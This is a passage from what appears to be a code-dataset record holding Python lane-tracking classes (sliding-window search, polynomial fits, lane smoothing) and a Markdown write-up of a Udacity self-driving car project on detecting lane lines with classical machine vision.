self.saturation_threshold(img_processor.warped)\n\n # Combine the averaging binaries\n self.ensemble = np.average([sobel_magnitude_binary,saturation_binary],weights=[1,1],axis=0)\n\n ensemble_binary = self.ensemble >= thresh\n\n combined_binary = np.zeros_like(self.s_channel)\n \n # Excluding direction binary for now\n combined_binary[ensemble_binary] = 1\n \n return combined_binary\n\n\n\nclass LaneTracker():\n def __init__(self,lane,xm_per_pix,ym_per_pix\n ,window_height=40,window_width=150,minpix=50):\n \n\n self.window_height = window_height # number of pixels for window height\n self.window_width = window_width # number of pixels for window width\n self.minpix = minpix # number pixels needed to recenter window\n\n # Meters to pixels conversion\n self.xm_per_pix = xm_per_pix\n self.ym_per_pix = ym_per_pix\n\n if lane not in ['left','right']:\n print('Choose lane as left or right and not %s'%lane)\n self.lane = lane\n\n\n # Initialize tracking statistics from past detections\n self.polyfit = None\n\n def reset(self):\n self.polyfit = None\n\n def get_initial_lane_col(self):\n '''Make initial guess of lane position (column 
pixel)\n based on histogram of bottom half of binary image'''\n\n # Calculate bottom half histogram\n histogram = np.sum(self.bimg[int(self.bimg.shape[0]/2):]\n ,axis=0)\n self.histogram = histogram\n\n # Guess left and right lane position based on peaks in histogram\n midpoint= int(len(histogram)/2)\n if self.lane == 'left':\n lane_col = np.argmax(histogram[:midpoint])\n else: lane_col = np.argmax(histogram[midpoint:]) + midpoint\n\n return lane_col\n\n def _find_lane_in_window(self,hot_rows,hot_cols,window):\n\n '''Find hot indices within a small window of image'''\n\n # Indices for hot pixels between top and bottom row\n within_top_bot = (hot_rows <= window.bottom) & (hot_rows > window.top)\n \n # Indices for in the band and within Left window\n within_left_right = (hot_cols >= window.left) & (hot_cols < window.right)\n\n # Indices within top,bottom,left, and right\n # and thus within the window\n within_window = within_top_bot & within_left_right\n\n hot_inds, = within_window.nonzero()\n return hot_inds\n\n\n\n def search_entire_image(self,hot_rows,hot_cols,draw=False):\n '''Search entire image of lanes using iteration of sliding window'''\n\n # Get initial lane positions using histogram\n init_lane_col = self.get_initial_lane_col()\n bottom_row = self.bimg.shape[0]\n\n\n # Initialize window\n win = Window(self.window_height,self.window_width)\n win.update_position(init_lane_col,bottom_row)\n\n\n # Holder for all lane pixel indices throughout binary image\n lane_inds = []\n\n\n # Iterate through windows while window is within image\n while win.top > 0:\n\n # Draw for debug and documentation\n if draw:\n cv2.rectangle(self.out_img,(win.left,win.bottom)\n ,(win.right,win.top),(0,255,0), 2)\n \n # Get indices of hot pixels within window\n hot_ind = self._find_lane_in_window(hot_rows,hot_cols,win)\n lane_inds.append(hot_ind)\n\n # If enough pixels are hot, shift the window\n if len(hot_ind) >= self.minpix:\n center_col = int(np.mean(hot_cols[hot_ind]))\n else: center_col = win.center_col\n\n # Update window position\n win.update_position(center_col)\n\n\n # Post-iteration cleanup\n # Combine hot indices\n lane_inds = np.concatenate(lane_inds) \n\n # Get pixel values of left and right lanes\n lane_rows = hot_rows[lane_inds]\n lane_cols = hot_cols[lane_inds]\n\n return lane_rows,lane_cols\n\n def find_near_previous(self,hot_rows,hot_cols):\n '''Find hot pixels close to previously drawn polyfit'''\n\n # Set margin around previous lane to accept new pixels\n margin = 100\n \n # Determine polynomial line fit from previous fit\n previous_cols = self.apply_polyfit(hot_rows,self.polyfit)\n\n # Find indices where new lane is within margin of previous lane\n lane_inds = (hot_cols < (previous_cols + margin)) & (hot_cols > (previous_cols - margin))\n\n # Get pixel values of left and right lanes\n lane_rows = hot_rows[lane_inds]\n lane_cols = hot_cols[lane_inds]\n\n return lane_rows,lane_cols\n\n def find_lane(self,img_processor,draw=False):\n '''Iteratively search of lanes within small windows. Start from\n bottom of image and move windows towards top of image until no\n longer within image. \n '''\n\n # Save incoming image\n self.bimg = img_processor.binary\n\n # Preprae output image on which overlays will be placed\n self.out_img = np.dstack((self.bimg,self.bimg,self.bimg))*255\n\n # Get \"hot\" rows and columns. Hot means binary = 1\n # These are arrays of pixel values where the binary image\n # is not zero. 
Variable names ending in _ind represent\n # indices into these arrays\n hot_rows,hot_cols = self.bimg.nonzero()\n \n # The actual search for lane pixels\n if self.polyfit is None:\n lane_rows,lane_cols = self.search_entire_image(hot_rows,hot_cols,draw=draw)\n else:\n lane_rows,lane_cols = self.find_near_previous(hot_rows,hot_cols)\n\n\n # Get radius of curvature\n self.radius_of_curve = self.get_curvature(lane_rows,lane_cols)\n\n # Fit raw polynomial in pixel space\n self.poly_rows,self.poly_cols,self.polyfit = self.get_polyfit(lane_rows,lane_cols)\n\n # Draw lane pixels \n if draw:\n # Draw hot pixels\n if self.lane == 'left': color = [255,0,0]\n else: color = [0,0,255]\n self.out_img[lane_rows,lane_cols] = color\n\n\n def apply_polyfit(self,poly_rows,polyfit):\n '''Return polynomial estimated columns for an array of rows'''\n\n # Polynomial of row array\n poly_rows_matrix = np.vstack([poly_rows**2,poly_rows,np.ones_like(poly_rows)]).T\n \n # Multiply polynomial with coefficients\n poly_cols = np.dot(poly_rows_matrix,polyfit)\n \n return poly_cols\n\n def get_polyfit(self,lane_rows,lane_cols):\n '''Fit a 2nd degree polynomial. Lane rows and cols can be in pixels\n or meters, it doesn't matter '''\n \n # Fit weighted polynomial\n polyfit = np.polyfit(lane_rows, lane_cols,2)\n \n # Create rows for which polynomial will be calculated for\n poly_rows = np.arange(self.out_img.shape[0])\n poly_cols = self.apply_polyfit(poly_rows,polyfit)\n \n\n return poly_rows,poly_cols,polyfit\n\n def get_curvature(self,lane_rows,lane_cols):\n\n # Pixels to meters conversion\n lane_rows_meters = lane_rows*self.ym_per_pix\n lane_cols_meters = lane_cols*self.xm_per_pix\n\n _,_,polyfit_meters = self.get_polyfit(lane_rows_meters,lane_cols_meters)\n # Calculate the radii of curvature\n # y_eval is y position at which curvature is to be calculated\n # Example values: 632.1 m 626.2 m\n y_eval = self.out_img.shape[0]\n y_eval_meters = y_eval*self.ym_per_pix\n\n radius_curve = ((1 + (2*polyfit_meters[0]*y_eval_meters + polyfit_meters[1])**2)**1.5) / np.absolute(2*polyfit_meters[0])\n\n return radius_curve\n\n\n \nclass Window():\n def __init__(self,height=40,width=150):\n \n # Set window parameters\n self.height = height # number of pixels for window height\n self.width = width # number of pixels for window width\n\n \n def update_position(self,center_col,bottom_row=None):\n\n # Save center column\n self.center_col = center_col\n\n # Left and right columns\n self.left = center_col - int(self.width/2)\n self.right = self.left + self.width\n\n # Window rows\n # If no bottom row is given, use the current top row\n if bottom_row is None:\n self.bottom = self.top\n else:\n self.bottom = bottom_row\n self.top = self.bottom - self.height\n\n if self.top <= 0:\n self.top = 0\n\nclass LaneVerifier:\n def __init__(self):\n self.left_history = []\n self.right_history = []\n self.history_length = 10\n self.sd_width_thresh = 80 # in pixels\n self.mean_width_thresh = 900 # in pixels\n \n self.last_left_good_poly_cols = None\n self.last_right_good_poly_cols = None\n\n def ingest_lanes(self,left_tracker,right_tracker):\n\n self.left_history.append(left_tracker)\n self.right_history.append(right_tracker)\n if len(self.left_history) > self.history_length:\n self.left_history.pop(0)\n if len(self.right_history) > self.history_length:\n self.right_history.pop(0)\n \n # Smoothen lane tracks using history \n left_tracker.smooth_poly_cols = self.smooth_lane(self.left_history)\n right_tracker.smooth_poly_cols = 
self.smooth_lane(self.right_history)\n \n \n # Check consistency for the pair\n if self.pair_consistent(left_tracker.smooth_poly_cols,right_tracker.smooth_poly_cols):\n self.last_left_good_poly_cols = left_tracker.smooth_poly_cols\n self.last_right_good_poly_cols = right_tracker.smooth_poly_cols\n #print('consisten')\n \n elif (self.last_left_good_poly_cols is not None \n and self.last_right_good_poly_cols is not None):\n \n left_tracker.smooth_poly_cols = self.last_left_good_poly_cols\n right_tracker.smooth_poly_cols = self.last_right_good_poly_cols\n \n #print('lanes no good')\n\n\n def smooth_lane(self,history):\n '''Take weighted average of last lane detections'''\n\n poly_cols = np.array([track.poly_cols for track in history]) \n smooth_poly = np.average(poly_cols,axis=0\n ,weights=1+np.arange(len(history)))\n\n return smooth_poly\n \n def pair_consistent(self,left_smooth_poly_cols,right_smooth_poly_cols):\n '''Do checks at the pair level'''\n consistent = True\n \n # Ensure parallel\n self.pixel_width = right_smooth_poly_cols - left_smooth_poly_cols\n \n #print('SD %.2f'%np.std(self.pixel_width))\n #print('Mean %.2f'%np.average(self.pixel_width))\n if np.std(self.pixel_width) > self.sd_width_thresh:\n consistent = False\n elif np.average(self.pixel_width) > self.mean_width_thresh:\n consistent = False\n \n return consistent\n\n\nif __name__ == '__main__':\n # Test code\n tools = CameraTools()\n tools.calibrate_camera()\n"
},
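The curvature math in `get_curvature` above reduces to evaluating R = (1 + (2Ay + B)^2)^1.5 / |2A| for a second-degree fit x = Ay^2 + By + C in meter space. Below is a self-contained sketch with synthetic lane pixels; the conversion factors mirror the ones discussed in the project write-up that follows:

```python
import numpy as np

# Self-contained sketch of the radius-of-curvature math in get_curvature.
# The lane pixels are synthetic; the conversion factors follow the write-up.
ym_per_pix = 3 / 65      # meters per pixel, vertical
xm_per_pix = 3.7 / 672   # meters per pixel, horizontal

rows = np.linspace(0, 719, 50)            # pixel rows down a 720-row image
cols = 300 + 0.0005 * (rows - 719) ** 2   # a gently curving synthetic "lane"

# Fit x = A*y^2 + B*y + C in meter space, as the tracker does
A, B, C = np.polyfit(rows * ym_per_pix, cols * xm_per_pix, 2)

# Evaluate curvature at the bottom of the image (closest to the car)
y_eval = 719 * ym_per_pix
radius = (1 + (2 * A * y_eval + B) ** 2) ** 1.5 / abs(2 * A)
print(f"radius of curvature: {radius:.0f} m")
```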
{
"alpha_fraction": 0.7775919437408447,
"alphanum_fraction": 0.7827759385108948,
"avg_line_length": 70.61676788330078,
"blob_id": "3a91d708a5f82aae1413f1c10ddb22affa8ecb37",
"content_id": "c13e071bdf0e0caad4975671f516fe188e29cac5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11960,
"license_type": "no_license",
"max_line_length": 725,
"num_lines": 167,
"path": "/index.md",
"repo_name": "qcqqcq/udacity-CarND-Advanced-Lane-Tracking-P4",
"src_encoding": "UTF-8",
"text": "---\ntitle: Lane Tracking for Autonomous Vehicles\ntagline: Tracking lanes using classical machine vision for the Udacity AV Nanodegree Program\ndescription: Tracking lanes using classical machine vision for the Udacity AV Nanodegree Program\n---\n\n*This is part of my series on the Udacity Self Driving Car Nanodegree Program*\n\nOne of the cool things about autonomous vehicle technlogies is that it takes ideas from all fields. While deep neural networks are all the rage nowadays, classical machine vision still has it's place in the field. Will this still be the case in the next 30 years? Only time will tell. In the meanwhile, check out what I did using a simple workflow with Sobel operators and a few transforms identify and track lane lines. I'll start out showing the end results first:\n\n\n[](https://www.youtube.com/watch?v=_2KKQbVfB2E)\n\n\nIf clicking the above image doesn't take you to the video, trying using the [Video Link Here](https://youtu.be/_2KKQbVfB2E)\n\n## Overall Steps\n\nTo create the video, the following steps were taken:\n\n* Calibrate the camera using given a set of chessboard images to correct for radial and tangental distortions.\n* Apply a distortion correction to raw images.\n* Apply a perspective transform to rectify the image (\"birds-eye view\").\n* Use color transforms, gradients, etc. and apply thresholds to obtain a binary image\n* Detect lane pixels and fit to find the lane boundary.\n* Determine the curvature of the lane and vehicle position with respect to center.\n* Warp the detected lane boundaries back onto the original image.\n* Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.\n\n[//]: # (Image References)\n\n[checker]: ./output_images/undistorted_checker.jpg \"Calib\"\n[undistort]: ./output_images/undistorted_road.jpg \"Undistort\"\n[warp_src]: ./output_images/warp_source.jpg \"Warp Src\"\n[warp_src_zoom]: ./output_images/warp_source_zoomed.jpg \"Warp Src Zoom\"\n[warp]: ./output_images/warped_road.jpg \"Warp\"\n\n[sobel_mag]: ./output_images/sobel_mag.jpg \"SobelMag\"\n[sobel_mag_bin]: ./output_images/sobel_mag_bin.jpg \"SobelMagBin\"\n[sobel_dir]: ./output_images/sobel_dir.jpg \"SobelDir\"\n[sobel_dir_bin]: ./output_images/sobel_dir_bin.jpg \"SobelDirBin\"\n[sat]: ./output_images/saturation.jpg \"Sat\"\n[sat_bin]: ./output_images/saturation_bin.jpg \"SatBin\"\n[combo]: ./output_images/combined_bin.jpg \"Combo\"\n\n[hist]: ./output_images/binary_histogram.jpg \"hist\"\n[win]: ./output_images/windows_polynomial.jpg \"hist\"\n\n[overlaid]: ./output_images/overlaid.jpg \"ol\"\n\n## Camera Calibration\n\nCheckerboard calibration images are given in the repository They tell the camera what a flat, straight, perpendicular lines look like so it can apply the appropriate corrections. Check out how it corrects the below image:\n\n![alt text][checker]\n\nNotice how in the left image, you can intuitively tell that something's not quite right. If you look closely, you'll notice the checkerboard lines are quite...straight. They seem \"bent\" somehow. This is kind of [distortion](https://en.wikipedia.org/wiki/Distortion_(optics)) is actually present in almost any lens out there. You probably didn't notice since today's high tech cameras where the lens position never changes already correct for this. Also, you probably aren't taking pictures of checkerboards so it's not actually that easy to tell.\n\nBelow is the correction applied to a real world image. 
See any differences?\n\n![alt text][undistort]\n\nI can't tell either. I guess maybe if I take out the photo editor and overlay some lines maybe I can tell. But for most artistic pictures of the kids, this kind of thing probably isn't noticable. BUT, since we're doing careful lane tracking here, we need to be a bit more careful.\n\n## Perspective Transform\n\nA perspective transform takes the image from the vehcile view to a bird's eye view. To acheive this, \"source\" points must be identified which correspond to 4 points that form a rectangle in the bird's eye view. This only needs to be done once and can be applied to all other images as long as the camera is not moved. Source point identification can be done using machine vision but here it is manually selected using trial and error.\n\nA test image with straight lanes is used. Source points are shown below. These points resulted in two parallel lines after applying the transform.\n\n![alt text][warp_src] \n![alt text][warp_src_zoom] \n\nHere's the perpsective transform applied to a more curvey road:\n\n![alt text][warp] \n\nAlso notice how this process also sets a region of interest. It allows us to ignore anything outside of this bird's eye view. This comes in handy when we're applying transforms and deciding on which threshold values to use.\n\n## Thresholding to get a binary image\n\nNow that image has been transformed to a bird's eye view (which also identifies a region of interest), lanes are identified. In this approach, various transforms are applied and threshold values are chosen based on qualitative evaluation based on test images and the project video. We then form binary images where if the transformed pixel has values within the threshold range, we set that pixel to 1, otherwise set it to 0. This gives a binary image. Since might seem unclear at first if you're not from the machine vision world, so I'll outine the steps below.\n\nThe three transformations applied are\n* Sobel magnitude\n* Sobel direction\n* Saturation level (after HSL conversion)\n\n\n### Sobel Magnitude\n\nSobel magnitude is calculated by converting the image to gray scale (i.e. a black and white image) then applying the [Sobel Operator](https://en.wikipedia.org/wiki/Sobel_operator) in X and y directions (thus forming a 2D vector at every pixel) and taking the magnitude. This vector is the gradient of the pixel intensities. The image below show the transformation:\n\n![alt text][sobel_mag]\n\nHere the colorbar values are the magnitutes of the Sobel vectors. After viewing a bunch of images and experimenting with different threshold values, I chose to accept only pixels in the range of [30-100]. Thresholding on this (within range = 1, outside range = 0) results in the following binary image:\n\n![alt text][sobel_mag_bin]\n\n\n### Sobel Direction\n\nThe same procedure is done for the direction of the Sobel vectors:\n\n![alt text][sobel_dir]\n\nwhere accepted values are in [0-0.4], resulting in the following binary:\n\n![alt text][sobel_dir_bin]\n\n\n### Color Saturation\nNormally, images are described in terms of the pixel's RGB (red-green-blue) values. But for image processing, this is isn't always the best respresentation. Here, we first convert the image to HSL (hue-saturation-luminance) space, then threshold only based on the saturation channel:\n\n![alt text][sat]\n\nand accepting only values [120,220] gives:\n\n![alt text][sat_bin]\n\n\n### Combining Binary Images\nCombining the various binary images into a final image can be done a number of ways. 
Here, the combined binary chosen to be the union of the Sobel magnitude binary and saturation binary. The Sobel direction binary was deemed too noisy. The combined binary is shown below:\n\n![alt text][combo]\n\n\n## Identifying which binary pixels are part of the lane lines\n\nFrom the binary image, the lane lines become clear with occasional noise. To fit a polynomial and guess the middle of the lane lines are, we have to further refine which pixels are lanes and which (left or right) lane the pixels belong to. To make an initial guess of the lane positions, a histogram of the binary values along each column is calculated. The histgram only evaluates pixels in the lower half of the image.\n\n![alt text][hist]\n\n\nThe x axis represents columns in the combined binary image and the y axis is the number of (binary) pixels are 1 (and not 0) within that row. From looking at the peaks of the histogram and dividing along the center (pixel 640 in the horizontal direction), the initial position (lowest in the image) of both lanes are determined. From here, we do a window search, shown below and explained after the image:\n\n![alt text][win]\n\nThe windows heights are 40 pixels and widths are 150 pixels. The first window is at the lowest part of the image and centered along the initial left and right values (determined from the histogram). All pixels within the lowest window are identified (and colored for visualization). The windows then shift up until they reach the highest pixels. With every shift up, the windows can be re-centered if more than 50 pixels are idntified in the window. If so, the next window is centered around the mean of the column values of the current window. \n\nOnce pixel values are identified, a second degree polynomial is fit along the values to determine the center of each lane (shown in yellow above).\n\nOnce this whole-image search is completed, in the next frame left and right lane pixels are identified if they simply lay within a margin (100 pixels to the left or 100 pixels to the right) of the polynomial fit. A new polynomial is then fit with these new pixel values.\n\n\n### Radius of curvature\n\nTo calculate the radius of curvature, a conversion from pixels to meters is required. By assuming a standard lane width of 3.7 meters and counting horizontal pixels, it is determined that there are 3.7/672 pixels per meter in the horizontal direction. By assuming a lane segment is 3 meters in the vertical direction, it is determined that there are 3/65 meters per pixel in the vertical direction. By using these ratios to convert to meters and re-fitting the polynomial, the polynomial coefficients are used to calculat the radius of curvature for each lane in each frame, evaluated at the bottom of the frame. It was found that the measurement was quite sensitive and noisey and perhaps not reliable using this approach.\n\n## Transforming back to the camera view and pipelining to overlay on a video\n\nBefore bringing the lane polynomial fits back to the image, some lane validation and smoothing steps are performed. Every lane position is the average of the last 10 positions, which mediates jumping lane lines. There are also requirements to check that the lanes are roughly parallel and of an acceptable width. If these requirements are not met, the lane lines take on the those of the last good lane tracks.\n\n\nOnce lanes are verified, they warped back to the camera view and overlayed on top of the original image. 
From here, assuming a lane width of 3.7 meters, we can also determine the position of the vehicle laterally within the lane. Here, positive means to the right of the center.\n\n![alt text][overlaid]\n\nThese steps are then placed in a pipeline and used to produce the above video\n\n## Discussion\n\nThis approach doesn't require much data since there is no model to train but the manual tuning of parameters is tedious and only through many iterations and exposure to different driving conditions can a good set of parameters be found. Even then there's no measurement of how well the parameters work on a wide array of videos. Tuning them on only one or two videos certainly won't be robust.\n\nImprovement can be had at the binary transforms section by doing some weighted average not at the binary level but at the transformed level. For example, each value of saturation will have a high confidence level based on closely within the parameters and if the same pixels are also within a good range with respect to the Sobel transforms then it can be of higher confidence. The polynomial fit can then be weighted using the confidence of these pixels.\n\nThere was not testing for night time videos so that require more tuning or even a seperate set of parameters. In embedded systems, such added complexity will be weighed against limited device processing power, especially since the device will be busy with other tasks as well. This approach seems to be computationally expensive, with the many transforms involved.\n"
}
] | 2 |
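The perspective-transform step described in index.md above boils down to two OpenCV calls. A minimal sketch follows; the source points are placeholders, not the values the author tuned by hand on the straight-lane test image:

```python
import numpy as np
import cv2

# Sketch of the bird's-eye perspective warp described in index.md above.
# The source points are placeholders; the write-up picks them by hand,
# so real values will differ.
h, w = 720, 1280
src = np.float32([[200, 720], [580, 460], [700, 460], [1080, 720]])
offset = 300
dst = np.float32([[offset, h], [offset, 0], [w - offset, 0], [w - offset, h]])

M = cv2.getPerspectiveTransform(src, dst)     # camera view -> bird's eye
Minv = cv2.getPerspectiveTransform(dst, src)  # bird's eye -> camera view

img = np.zeros((h, w, 3), dtype=np.uint8)     # stand-in for a road frame
warped = cv2.warpPerspective(img, M, (w, h))
print(warped.shape)  # (720, 1280, 3)
```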